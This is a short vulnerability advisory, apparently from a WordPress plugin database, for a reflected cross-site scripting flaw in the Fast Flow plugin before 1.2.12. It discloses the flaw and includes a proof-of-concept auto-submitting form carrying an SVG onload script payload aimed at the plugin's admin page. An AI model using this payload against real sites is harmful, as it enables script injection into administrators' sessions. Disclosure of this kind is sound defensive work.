WordPress Plugin Vulnerabilities

Fast Flow < 1.2.12 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the page parameter before outputting back in an attribute in an admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=fast-tagger" method="post" name="form1">
   <input type="text" name="page" value='"><svg/onload=alert(/xss/)>'>
  <button type="submit"></button>
</form>
<script>
   document.form1.submit();
</script>

Affects Plugins

Fixed in 1.2.12

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
p7e4
Submitter
p7e4
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-04-11 (about 2 years ago)
Added
2022-04-11 (about 2 years ago)
Last Updated
2022-08-12 (about 1 years ago)

Other